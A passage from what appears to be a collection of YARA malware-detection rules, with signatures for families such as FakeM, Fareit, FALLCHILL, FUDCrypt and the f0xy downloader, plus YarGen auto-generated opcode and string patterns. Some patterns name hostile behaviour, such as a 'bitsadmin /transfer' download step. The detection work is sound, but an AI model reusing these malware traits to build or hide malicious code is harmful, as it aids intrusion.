    $ = "\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12"
    $ = "\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12"
    $ = "Ezcob" ascii wide
    $ = "l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126"
    $ = "20110113144935"
  condition:
    any of them
}

rule Ezcob : Family {
  meta:
    description = "Ezcob"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  condition:
    EzcobStrings
}

rule ws_f0xy_downloader {
  meta:
    description = "f0xy malware downloader"
    author = "Nick Griffin (Websense)"
  strings:
    $mz = "MZ"
    $string1 = "bitsadmin /transfer"
    $string2 = "del rm.bat"
    $string3 = "av_list="
  condition:
    ($mz at 0) and (all of ($string*))
}

rule rc4_stack_key_fallchill {
  meta:
    description = "rc4_stack_key"
    ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
  strings:
    $stack_key = { 0D 06 09 2A ?? ?? ?? ?? 86 48 86 F7 ?? ?? ?? ?? 0D 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8B C9 41 8B D1 49 8B 40 08 48 FF C2 88 4C 02 FF FF C1 81 F9 00 01 00 00 7C EB }
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and $stack_key
}

rule success_fail_codes_fallchill {
  meta:
    description = "success_fail_codes"
    ref = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
  strings:
    $s0 = { 68 7A 34 12 00 }
    $s1 = { BA 7A 34 12 00 }
    $f0 = { 68 5C 34 12 00 }
    $f1 = { BA 5C 34 12 00 }
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and (($s0 and $f0) or ($s1 and $f1))
}

rule FUDCrypter {
  meta:
    description = "Detects unmodified FUDCrypt samples"
    reference = "https://github.com/gigajew/FudCrypt/"
    author = "https://github.com/hwvs"
    last_modified = "2019-11-21"
  strings:
    $ = "OcYjzPUtJkNbLOABqYvNbvhZf" ascii wide
    $ = "gwiXxyIDDtoYzgMSRGMckRbJi" ascii wide
    $ = "BclWgISTcaGjnwrzSCIuKruKm" ascii wide
    $ = "CJyUSiUNrIVbgksjxpAMUkAJJ" ascii wide
    $ = "fAMVdoPUEyHEWdxQIEJPRYbEN" ascii wide
    $ = "CIGQUctdcUPqUjoucmcoffECY" ascii wide
    $ = "wcZfHOgetgAExzSoWFJFQdAyO" ascii wide
    $ = "DqYKDnIoLeZDWYlQWoxZnpfPR" ascii wide
    $ = "MkhMoOHCbGUMqtnRDJKnBYnOj" ascii wide
    $ = "sHEqLMGglkBAOIUfcSAgMvZfs" ascii wide
    $ = "JtZApJhbFAIFxzHLjjyEQvtgd" ascii wide
    $ = "IIQrSWZEMmoQIKGuxxwoTwXka" ascii wide
  condition:
    1 of them
}

rule HTMLVariant : FakeM Family HTML Variant {
  meta:
    description = "Identifier for html variant of FAKEM"
    author = "Katie Kleemola"
    last_updated = "2014-05-20"
  strings:
    $s1 = { 8B 55 08 B9 00 50 00 00 8D 3D ?? ?? ?? 00 8B F7 AD 33 C2 AB 83 E9 04 85 C9 75 F5 }
    $s2 = { C6 45 F? ( 3? | 4? ) }
  condition:
    $s1 and #s2 == 16
}

rule FakeM_Generic {
  meta:
    description = "Detects FakeM malware samples"
    author = "Florian Roth"
    reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
    date = "2016-01-25"
    score = 85
    hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
    hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
    hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
    hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
    hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
    hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
    hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
    hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
    hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
    hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
    hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
  strings:
    $a1 = "\\system32\\kernel32.dll" ascii fullword
    $a2 = "\\boot.lnk" ascii fullword
    $a3 = "%USERPROFILE%" ascii fullword
    $b1 = "Wizard.EXE" wide fullword
    $b2 = "CommandLineA" ascii fullword
    $c1 = "\\system32\\kernel32.dll" ascii fullword
    $c2 = "\\aapz.tmp" ascii fullword
    $e1 = "C:\\Documents and Settings\\A\\" ascii fullword
    $e2 = "\\svchost.exe" ascii fullword
    $e3 = "\\Perform\\Release\\Perform.pdb" ascii fullword
    $f1 = "Browser.EXE" wide fullword
    $f2 = "\\browser.exe" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and (all of ($a*) or all of ($b*) or all of ($c*) or all of ($e*) or 1 of ($f*))
}

rule Fareit_Trojan_Oct15 {
  meta:
    description = "Detects Fareit Trojan from Sep/Oct 2015 Wave"
    author = "Florian Roth"
    reference = "http://goo.gl/5VYtlU"
    date = "2015-10-18"
    score = 80
    super_rule = 1
    hash1 = "230ca0beba8ae712cfe578d2b8ec9581ce149a62486bef209b04eb11d8c088c3"
    hash2 = "3477d6bfd8313d37fedbd3d6ba74681dd7cb59040cabc2991655bdce95a2a997"
    hash3 = "408fa0bd4d44de2940605986b554e8dab42f5d28a6a525b4bc41285e37ab488d"
    hash4 = "76669cbe6a6aac4aa52dbe9d2e027ba184bf3f0b425f478e8c049637624b5dae"
    hash5 = "9486b73eac92497e703615479d52c85cfb772b4ca6c846ef317729910e7c545f"
    hash6 = "c3300c648aebac7bf1d90f58ea75660c78604410ca0fa705d3b8ec1e0a45cdd9"
    hash7 = "ff83e9fcfdec4ffc748e0095391f84a8064ac958a274b9684a771058c04cb0fa"
  strings:
    $s1 = "ebai.exe" wide fullword
    $s2 = "Origina" wide fullword
  condition:
    uint16(0) == 23117 and $s1 in (0..30000) and $s2 in (0..30000)
}

rule FavoriteCode : Favorite Family {
  meta:
    description = "Favorite code features"
    author = "Seth Hardy"
    last_modified = "2014-06-24"
  strings:
    $ = { C6 45 ?? 3B C6 45 ?? 27 C6 45 ?? 34 C6 45 ?? 75 C6 45 ?? 6B C6 45 ?? 6C C6 45 ?? 3B C6 45 ?? 2F }
    $ = { C6 45 ?? 6F C6 45 ?? 73 C6 45 ?? 73 C6 45 ?? 76 C6 45 ?? 63 C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 }
  condition:
    any of them
}

rule FavoriteStrings : Favorite Family {
  meta:
    description = "Favorite Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-24"
  strings:
    $string1 = "!QAZ4rfv"
    $file1 = "msupdater.exe"
    $file2 = "FAVORITES.DAT"
  condition:
    any of ($string*) or all of ($file*)
}

rule d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9 {
  meta:
    description = "Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    hash1 = "d1dc9b2905264da34dc97d6c005810fbcc99be1a6b4b41f883bb179dbcacba6e"
  strings:
    $s1 = ":&:-:=:J:O:\\:m:r:" ascii fullword
    $s2 = "6)6/666;6N6W6^6c6t6y6" ascii fullword
    $s3 = "666Q6V6b6g6~6" ascii fullword
    $s4 = "0%0,010A0F0K0\\0a0f0w0|0" ascii fullword
    $s5 = "6!6(63686E6J6W6\\6i6n6{6" ascii fullword
    $s6 = "3 3%33383=3J3R3`3e3o3t3~3" ascii fullword
    $s7 = "4 4'40454:4G4M4R4_4e4j4w4" ascii fullword
    $s8 = "1#1(141=1B1N1T1Y1e1k1p1|1" ascii fullword
    $s9 = "?(?2?<?C?J?Q?X?_?f?m?t?{?" ascii fullword
    $s10 = "?#?*?1?8???F?M?T?[?b?i?p?w?" ascii fullword
    $s11 = "6)6/646@6F6K6W6]6b6n6w6|6" ascii fullword
    $s12 = "4#40454:4G4L4Q4^4c4h4u4z4" ascii fullword
    $s13 = "<\"<'<3<8<=<I<N<S<_<d<i<u<z<" ascii fullword
    $s14 = ">%>/>9>@>G>N>U>\\>c>j>q>" ascii fullword
    $s15 = "WTZDAE" ascii fullword
    $s16 = "060>0E0K0P0\\0b0g0v0|0" ascii fullword
    $s17 = "4#4-474A4K4U4\\4f4p4z4" ascii fullword
    $s18 = "7\"7,767@7J7T7^7h7q7{7" ascii fullword
    $s19 = ";\";';4;E;J;W;k;p;};" ascii fullword
    $s20 = ";0;;;F;Q;\\;g;r;};" ascii fullword
    $op0 = { A1 B8 63 44 00 83 C4 14 53 FF 75 14 56 57 FF 90 }
    $op1 = { 8B D8 8B 45 08 8B 40 3A 81 C3 00 10 00 00 03 C3 }
    $op2 = { 5C 2D 44 00 C7 84 24 C0 }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (10 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule sig_7acb8d6d4c062c3097a7d31df103bc4d018519f9 {
  meta:
    description = "Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    hash1 = "e1607486cbb2d111d5df314fe58948aa0dc5897f56f7fd763c62bb30651380e3"
  strings:
    $s1 = "5(666Z6c6" ascii fullword
    $s2 = "Wlm;y%UD%d" ascii fullword
    $s3 = ";1;9;@;G;N;U;\\;c;j;q;x;" ascii fullword
    $s4 = "8 8'8.858<8C8J8Q8X8_8f8m8t8" ascii fullword
    $s5 = "2 2,282=2B2G2P2U2Z2_2h2s2x2" ascii fullword
    $s6 = "4'5.555<5C5J5Q5X5_5f5m5t5{5" ascii fullword
    $s7 = "0#0*01080?0F0M0T0[0b0i0p0w0" ascii fullword
    $s8 = "6$6,616=6B6G6S6X6]6i6n6s6" ascii fullword
    $s9 = "=\"=)=0=7=>=E=L=S=Z=a=h=" ascii fullword
    $s10 = "6&6-646;6B6I6P6W6^6e6l6s6z6" ascii fullword
    $s11 = "O.QrH@" ascii fullword
    $s12 = ">\">/>4>A>F>S>X>e>j>w>|>" ascii fullword
    $s13 = "0#0(040=0B0N0T0Y0e0k0p0|0" ascii fullword
    $s14 = "5)5/545@5F5K5W5`5e5q5w5|5" ascii fullword
    $s15 = "=!=&=3=8=E=N=S=`=e=s=x=}=" ascii fullword
    $s16 = ":(:/:6:=:D:K:R:Y:`:g:n:u:|:" ascii fullword
    $s17 = "7\"727<7F7M7W7a7k7u7" ascii fullword
    $s18 = "2+21262E2K2P2\\2h2m2|2" ascii fullword
    $s19 = ";/;5;:;G;V;\\;a;n;};" ascii fullword
    $s20 = ";\";-;8;C;N;^;i;t;" ascii fullword
    $op0 = { FF 44 24 14 8D 47 44 50 A1 08 63 44 00 FF 90 84 }
    $op1 = { 6D 43 00 C7 84 24 10 03 00 00 0C 6D 43 00 C7 84 }
    $op2 = { C7 43 0C 20 02 00 00 89 5D F0 FF 90 F8 }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (10 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule sig_5783b35b2eace55a5762df27fcb0b0fb28371b3e {
  meta:
    description = "Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    hash1 = "72513534f2e0f3e77a22023b887df3718c9df70686eb0ae58cbbde2f90f447e4"
  strings:
    $s1 = "B+P:\\6" ascii fullword
    $s2 = "6.666K6S6d6l6}6" ascii fullword
    $s3 = "0!0&0+0<0A0F0W0\\0a0n0z0" ascii fullword
    $s4 = ";#;);.;:;@;E;Q;W;\\;h;q;v;" ascii fullword
    $s5 = "2#2-222F2L2W2\\2b2g2x2~2" ascii fullword
    $s6 = "9\"9)90979>9E9L9S9Z9k9}9" ascii fullword
    $s7 = "6-747;7B7I7P7W7^7e7l7s7z7" ascii fullword
    $s8 = "4\"4'43494>4J4P4U4a4g4l4x4" ascii fullword
    $s9 = ":#:(:4:::?:K:T:Y:e:k:p:|:" ascii fullword
    $s10 = "WD.hyA" ascii fullword
    $s11 = "<\"<)<0<7<><E<L<S<Z<a<h<" ascii fullword
    $s12 = "=&=,=1=>=D=I=V=_=d=q=w=|=" ascii fullword
    $s13 = "; ;(;0;8;@;H;P;X;`;h;p;{;" ascii fullword
    $s14 = "<\"<)<0<7<><E<L<S<Z<a<h<o<v<" ascii fullword
    $s15 = "6#6(616;6@6I6S6X6d6n6s6|6" ascii fullword
    $s16 = "(%r-c;u" ascii fullword
    $s17 = "3%3G3N3U3\\3c3j3q3x3" ascii fullword
    $s18 = "7\"767T7[7b7i7p7w7~7" ascii fullword
    $s19 = "1 1-1>1C1P1a1f1s1" ascii fullword
    $s20 = "8 8&8,8A8M8^8d8i8" ascii fullword
    $op0 = { E0 B3 42 00 C7 84 24 AC }
    $op1 = { A1 E0 79 44 00 57 FF 75 1C FF 90 78 01 00 00 83 }
    $op2 = { 3C EE 42 00 C7 84 24 8C }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (10 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule sig_2fb404bdcebc7acbeb598f8a2ddbecf48c60b113 {
  meta:
    description = "Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
  strings:
    $s1 = ":%:0:;:F:Q:\\:p:|:" ascii fullword
    $s2 = "6.666>6F6N6V6^6f6n6v6~6" ascii fullword
    $s3 = "6!6(6/666=6D6K6R6Y6r6:7" ascii fullword
    $s4 = "1t83jL.bjG" ascii fullword
    $s5 = "6!61666V6]6p6" ascii fullword
    $s6 = "2%2D2P2`2p2|2" ascii fullword
    $s7 = "42494@4G4N4U4\\4c4j4q4x4" ascii fullword
    $s8 = "9+92999@9G9N9U9\\9c9j9q9x9" ascii fullword
    $s9 = "4!4&43484E4J4W4\\4i4n4s4" ascii fullword
    $s10 = "5$5+52595@5G5N5U5\\5c5j5q5" ascii fullword
    $s11 = "1.252<2C2J2Q2X2_2f2m2t2{2" ascii fullword
    $s12 = "8 8%818:8?8K8Q8V8b8h8m8y8" ascii fullword
    $s13 = "9'93989=9B9K9P9U9Z9c9n9s9" ascii fullword
    $s14 = ":\":':,:8:=:B:R:Z:`:e:v:}:" ascii fullword
    $s15 = "=#=(=4=:=?=K=Q=V=b=k=p=|=" ascii fullword
    $s16 = "= =*=1=8=?=F=M=T=[=b=i=p=w=~=" ascii fullword
    $s17 = "3&3-343;3B3I3P3W3^3e3l3s3z3" ascii fullword
    $s18 = ":!:(:/:6:=:I:N:S:`:f:k:x:~:" ascii fullword
    $s19 = "cMDkAjy=" ascii fullword
    $s20 = "=#=/=4=9=E=J=O=[=`=e=q=v={=" ascii fullword
    $op0 = { E0 B3 42 00 C7 84 24 AC }
    $op1 = { 3C EE 42 00 C7 84 24 8C }
    $op2 = { A1 E0 79 44 00 83 C4 0C FF 74 24 1C FF 90 3C 01 }
  condition:
    (uint16(0) == 23117 and filesize < 921600 and (10 of ($s*)) and 1 of ($op*)) or (all of them)
}

rule _84b76d765e7357fa5402b5af97d351424a8edf03_d0f90c1b3ebd79a816b5597a49ae8257df697591_da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb_0 {
  meta:
    description = "Auto-generated rule - from files 84b76d765e7357fa5402b5af97d351424a8edf03.codex, d0f90c1b3ebd79a816b5597a49ae8257df697591.codex, da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb.codex"
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2016-07-21"
    super_rule = 1
    hash1 = "add7ed26bc5bcacdf3159fcde71bdd429feeef94dff7d3b22bc9af9deb471c48"
    hash2 = "a9a62edbafa5932894ed53319c924932b94a0ccdf15644764256eed39fd46d86"
    hash3 = "efcc9e0377cf83a73bd5fbe42a51a2330936b8e362fc2ab99af6d932079893d9"
  strings:
    $s1 = ":\":':,:5:=:B:K:P:U:^:c:h:q:v:{:" ascii fullword
    $s2 = "Y@.hdd \\" ascii fullword
    $s3 = "0$0+02090@0G0N0U0\\0c0j0v0{0" ascii fullword
    $s4 = "6\"6(6-6:6I6O6T6a6p6v6{6" ascii fullword
    $s5 = "1\"1/14191F1K1P1]1b1g1t1y1~1" ascii fullword
    $s6 = "0\"0(0-0<0B0G0S0_0d0s0y0~0" ascii fullword
    $s7 = "9\"9'959:9?9L9Q9^9c9p9y9~9" ascii fullword
    $s8 = "3%3*363=3B3N3T3Y3e3k3p3|3" ascii fullword
    $s9 = "4#4)4.4:4C4H4T4Z4_4k4q4v4" ascii fullword
    $s10 = "|&.WTm" ascii fullword
    $s11 = "6#63686E6J6W6\\6i6n6{6" ascii fullword
    $s12 = ";\";(;7;F;W;];f;o;{;" ascii fullword
    $s13 = "0+02080>0B0P0\\0i0|0" ascii fullword
    $s14 = "1 1(10181C1N1Y1d1o1z1" ascii fullword
    $s15 = "3 3%3*3;3@3E3R3^3c3t3y3" ascii fullword
    $s16 = "8\"8)8.8:8?8S8X8f8r8x8" ascii fullword
    $s17 = "8$8+82898@8G8N8U8\\8" ascii fullword
    $s18 = "9-929?9P9U9b9s9x9" ascii fullword
    $s19 = "9*9/9<9A9N9T9`9e9r9w9" ascii fullword
    $s20 = "2-292?2G2N2U2\\2c2j2q2" ascii fullword
    $op0 = { E0 B3 42 00 C7 84 24 AC }
    $op1 = { 39 75 0C 59 8B D0 59 89 55 FC 7E 4B 0F B6 4C 3E }
    $op2 = { 3C EE 42 00 C7 84 24 8C }
    $op3 = { A1 A8 79 44 00 68 1C 40 43 00 57 FF 90 40 01 00 }
    $op4 = { 39 58 14 EB 31 A1 A8 79 44 00 57 FF 75 F4 56 FF }
    $op5 = { 66 3B D8 75 43 8B C6 2B 45 0C 89 45 FC EB 03 8B }
    $op6 = { F2 42 00 C7 84 24 5C 01 00 00 10 F2 42 00 C7 84 }
    $op7 = { 83 C4 10 89 44 24 1C 8D 44 24 34 50 56 FF 74 24 }
    $op8 = { 83 C4 14 83 F8 FF 74 13 8B 4D E8 8D 04 86 8B 04 }
    $op9 = { 7C B3 42 00 C7 84 24 9C }
    $op10 = { F8 AE 43 00 C7 84 24 E0 }
    $op11 = { 08 B4 42 00 C7 84 24 B8 }
    $op12 = { 57 56 89 44 24 1C 50 A1 A8 79 44 00 FF 90 78 01 }
    $op13 = { E0 17 43 00 C7 84 24 D8 }
    $op14 = { 8B 4D FC 8B 04 81 05 04 10 00 00 50 A1 A8 79 44 }
    $op15 = { 59 59 85 C0 0F 85 86 01 00 00 68 5C 5A 43 00 FF }
    $op16 = { 59 59 33 C0 5E 5F 5B C9 C3 FF 75 C8 8B 75 08 FF }
    $op17 = { 28 42 44 00 C7 84 24 C4 }
    $op18 = { 83 C4 18 89 45 FC 83 7D FC 00 0F 84 8F }
    $op19 = { 89 5D BC 89 5D FC FF 90 F8 }
    $op20 = { 59 59 85 C0 0F 85 43 05 00 00 68 9C 53 43 00 FF }
    $op21 = { FF 90 BC 02 00 00 3D 22 00 00 C0 75 40 8D 44 24 }
    $op22 = { 38 3C 44 00 C7 84 24 E0 }
    $op23 = { 85 C0 74 95 EB 03 88 5D FF A1 A8 79 44 00 57 FF }
    $op24 = { 6A 01 FF 75 AC FF 75 F4 6A 00 FF 75 0C A1 A8 79 }
    $op25 = { 40 AF 43 00 C7 84 24 00 01 00 00 48 AF 43 00 C7 }
    $op26 = { 83 65 08 00 59 59 66 8B 4B 02 66 49 66 89 48 02 }
    $op27 = { FF 75 10 8B D8 FF 75 0C A1 A8 79 44 00 68 38 5E }
    $op28 = { C4 B3 42 00 C7 84 24 A8 }
    $op29 = { DC 40 44 00 C7 84 24 98 }
    $op30 = { 30 AF 43 00 C7 84 24 FC }
    $op31 = { BF B0 25 44 00 57 89 4D F0 FF 90 C4 02 00 00 59 }
    $op32 = { 80 6A 43 00 C7 84 24 F0 }
    $op33 = { 80 EE 42 00 C7 84 24 9C }
    $op34 = { 1F 43 00 C7 84 24 68 02 00 00 14 1F 43 00 C7 84 }
    $op35 = { 68 FE FF 00 00 FF 75 08 89 44 24 28 A1 A8 79 44 }
    $op36 = { 89 74 24 68 89 74 24 6C FF 90 48 03 00 00 85 C0 }
    $op37 = { 85 C0 0F 84 95 FD FF FF FF 74 24 14 A1 A8 79 44 }
    $op38 = { 10 18 43 00 C7 84 24 E8 }
    $op39 = { FF 75 FC A1 A8 79 44 00 57 68 68 C6 43 00 68 8C }
    $op40 = { 59 59 89 45 88 8B 45 8C FF 30 8B 45 8C 83 C0 04 }
    $op41 = { 59 59 85 C0 0F 85 13 07 00 00 68 60 52 43 00 FF }
    $op42 = { 60 3C 44 00 C7 84 24 EC }
    $op43 = { 8B 45 0C FF 74 24 14 66 83 78 02 3F 50 A1 A8 79 }
    $op44 = { 59 59 85 C0 0F 85 FA 01 00 00 68 0C 5A 43 00 FF }
    $op45 = { FC F8 42 00 C7 84 24 C0 }
    $op46 = { 14 F9 42 00 C7 84 24 C8 }
    $op47 = { 3C 6A 43 00 C7 84 24 E8 }
    $op48 = { 88 42 44 00 C7 84 24 D4 }
    $op49 = { 83 C4 18 89 45 FC 83 7D FC 00 0F 84 04 01 00 00 }
    $op50 = { 59 59 85 C0 0F 85 68 02 00 00 FF 75 DC A1 A8 79 }
    $op51 = { 8B 46 3A 03 45 FC 50 A1 A8 79 44 00 FF 90 04 04 }
    $op52 = { 85 C0 0F 84 CD FD FF FF FF 74 24 14 A1 A8 79 44 }
    $op53 = { A1 A8 79 44 00 56 FF 90 A0 }
    $op54 = { 40 AE 43 00 C7 84 24 B0 }
    $op55 = { 83 C4 0C FF 75 88 FF 75 08 A1 A8 79 44 00 FF 90 }
    $op56 = { 68 58 5C 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op57 = { 78 27 43 00 C7 84 24 B0 }
    $op58 = { 3D 23 00 00 C0 74 0B 3D 05 00 00 80 0F 85 C7 }
    $op59 = { A1 A8 79 44 00 68 34 5F 44 00 57 FF 90 F4 03 00 }
    $op60 = { 0F BF 40 48 3B 45 CC 75 1D 50 8B 45 E4 83 C0 4C }
    $op61 = { 83 64 24 18 00 59 59 8B D8 C7 44 24 20 7C B5 42 }
    $op62 = { 68 1C 5C 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op63 = { 5C 28 43 00 C7 84 24 F0 }
    $op64 = { 59 59 3B C3 74 4A 83 7D CC 00 74 1F FF 75 F8 A1 }
    $op65 = { 60 F9 42 00 C7 84 24 D8 }
    $op66 = { 94 27 43 00 C7 84 24 B8 }
    $op67 = { 89 5C 24 40 89 5C 24 44 FF 90 C4 03 00 00 59 59 }
    $op68 = { 8B D8 59 59 8D 45 EC 50 A1 A8 79 44 00 8D 7B 02 }
    $op69 = { FF 90 68 01 00 00 8B F0 8D 45 FC 50 A1 A8 79 44 }
    $op70 = { A1 A8 79 44 00 68 E8 5E 44 00 57 FF 90 F4 03 00 }
    $op71 = { FF 45 F8 8D 47 44 50 A1 A8 79 44 00 FF 90 98 03 }
    $op72 = { FF 45 F8 8D 47 44 50 A1 A8 79 44 00 FF 90 98 03 }
    $op73 = { 44 B4 42 00 C7 84 24 D0 }
    $op74 = { 59 59 85 C0 75 4F 68 34 58 43 00 FF 75 B8 A1 A8 }
    $op75 = { 8B 44 24 24 83 C0 04 50 FF 75 08 E8 24 E6 FF FF }
    $op76 = { 60 40 44 00 C7 84 24 88 }
    $op77 = { 6A 1A 40 00 C7 81 A4 01 00 00 4E AA 41 00 C7 81 }
    $op78 = { 8B F8 59 59 3B FE 75 04 33 C0 EB 35 39 75 10 7E }
    $op79 = { 59 59 6A 05 5E 3B C7 75 10 39 35 D4 79 44 00 75 }
    $op80 = { 89 75 EC 89 75 F0 FF 90 0C 03 00 00 5F 5E 85 C0 }
    $op81 = { 89 75 EC 89 75 F0 FF 90 0C 03 00 00 5F 5E 85 C0 }
    $op82 = { 57 FF 75 08 89 45 DC A1 A8 79 44 00 FF 90 B8 }
    $op83 = { 58 3B 44 00 C7 84 24 88 }
    $op84 = { 83 C4 0C 8B 45 FC 8B 4D F4 89 08 68 81 }
    $op85 = { 0C 27 43 00 C7 84 24 90 }
    $op86 = { 2C 18 43 00 C7 84 24 F4 }
    $op87 = { A1 A8 79 44 00 68 18 5F 44 00 57 FF 90 F4 03 00 }
    $op88 = { FF 74 24 14 8B F0 A1 A8 79 44 00 56 FF 90 FC }
    $op89 = { A1 A8 79 44 00 68 94 E5 43 00 53 FF 90 90 }
    $op90 = { 8D 44 24 0C 50 A1 A8 79 44 00 FF 90 F8 01 00 00 }
    $op91 = { 85 C0 0F 95 C0 59 59 84 C0 74 3D FF 75 F4 A1 A8 }
    $op92 = { 59 59 8B F8 EB 30 8D 47 10 50 FF 75 FC A1 A8 79 }
    $op93 = { 50 FF 75 0C A1 A8 79 44 00 57 FF 90 AC 02 00 00 }
    $op94 = { 59 59 85 C0 0F 85 69 01 00 00 68 70 5A 43 00 FF }
    $op95 = { 91 43 00 C7 84 24 58 06 00 00 14 91 43 00 C7 84 }
    $op96 = { A1 A8 79 44 00 6A 00 68 70 E0 43 00 FF 75 08 FF }
    $op97 = { B0 68 43 00 C7 84 24 AC }
    $op98 = { 8B 43 3A 8B 4D FC 8D 04 88 03 C6 50 A1 A8 79 44 }
    $op99 = { 04 41 44 00 C7 84 24 A0 }
    $op100 = { 88 3B 44 00 C7 84 24 9C }
    $op101 = { 30 28 43 00 C7 84 24 E4 }
    $op102 = { C6 05 91 79 44 00 01 89 2D 9C 79 44 00 89 25 98 }
    $op103 = { C6 05 91 79 44 00 01 89 2D 9C 79 44 00 89 25 98 }
    $op104 = { 59 59 85 C0 0F 85 34 02 00 00 68 04 56 43 00 FF }
    $op105 = { A1 3C A0 42 00 89 81 9C 03 00 00 A1 18 A0 42 00 }
    $op106 = { 59 59 85 C0 0F 85 8B 02 00 00 68 BC 55 43 00 FF }
    $op107 = { 6C 68 43 00 C7 84 24 A0 }
    $op108 = { 83 C4 10 89 45 EC 8D 45 BC 50 A1 A8 79 44 00 56 }
    $op109 = { F0 42 44 00 C7 84 24 E0 }
    $op110 = { 30 F8 42 00 C7 84 24 94 }
    $op111 = { 8B F0 A1 A8 79 44 00 68 B4 B7 42 00 56 FF 90 FC }
    $op112 = { 59 59 85 C0 0F 85 09 05 00 00 68 B8 53 43 00 FF }
    $op113 = { 59 59 85 C0 75 68 68 B8 5B 43 00 FF 75 88 A1 A8 }
    $op114 = { A1 A8 79 44 00 BE FF 7F 00 00 56 53 FF 90 B8 }
    $op115 = { 59 59 85 C0 75 68 68 18 58 43 00 FF 75 B8 A1 A8 }
    $op116 = { 83 C4 14 8B C6 5E C3 55 8B EC 83 EC 14 83 7D 0C }
    $op117 = { 85 C0 A1 A8 79 44 00 75 0F 56 53 FF 90 2C 01 00 }
    $op118 = { 3D 22 00 00 C0 74 07 32 C0 E9 BE }
    $op119 = { B4 43 44 00 C7 84 24 00 01 00 00 C4 43 44 00 C7 }
    $op120 = { FF 75 F8 8D 43 10 50 FF 75 08 A1 A8 79 44 00 FF }
    $op121 = { 48 F9 42 00 C7 84 24 D4 }
    $op122 = { FF 75 F4 A1 A8 79 44 00 53 68 3C C8 43 00 68 54 }
    $op123 = { FF 75 FC A1 A8 79 44 00 57 68 14 C7 43 00 68 30 }
    $op124 = { 81 F9 D0 3F 00 00 0F 8E 9C }
    $op125 = { 68 94 61 44 00 68 B0 61 44 00 8B F8 A1 A8 79 44 }
    $op126 = { B0 AD 43 00 C7 84 24 88 }
    $op127 = { 85 C0 75 81 88 1E 83 7D FC 02 75 2C 8D 45 D4 50 }
    $op128 = { FF 75 FC A1 A8 79 44 00 57 68 E0 C6 43 00 68 FC }
    $op129 = { FF 75 10 50 FF 75 08 A1 A8 79 44 00 FF 90 50 01 }
    $op130 = { FF 75 0C 89 45 F8 68 98 E1 43 00 68 54 E2 43 00 }
    $op131 = { 59 59 8B F0 8D 45 F4 50 A1 A8 79 44 00 68 07 80 }
    $op132 = { 83 C4 0C FF 75 FC FF 75 08 A1 A8 79 44 00 FF 90 }
    $op133 = { 83 C4 0C FF 75 FC FF 75 08 A1 A8 79 44 00 FF 90 }
    $op134 = { 83 C4 0C FF 75 FC FF 75 08 A1 A8 79 44 00 FF 90 }
    $op135 = { FF 75 FC A1 A8 79 44 00 6A 02 68 A0 C7 43 00 68 }
    $op136 = { 8B 50 24 56 85 D2 0F 8E E2 }
    $op137 = { D4 42 44 00 C7 84 24 DC }
    $op138 = { 68 FE FF 00 00 FF 75 08 FF 90 B8 }
    $op139 = { A8 41 44 00 C7 84 24 B4 }
    $op140 = { 59 59 85 C0 0F 85 86 01 00 00 68 AC 56 43 00 FF }
    $op141 = { 59 59 85 C0 75 68 68 90 5C 43 00 FF 75 88 A1 A8 }
    $op142 = { 83 65 F8 00 83 65 FC 00 57 8B 7D 0C 85 FF 0F 84 }
    $op143 = { 80 75 15 83 78 08 00 74 0F A1 A8 79 44 00 57 56 }
    $op144 = { 85 C0 75 79 FF 74 24 1C A1 A8 79 44 00 FF 75 0C }
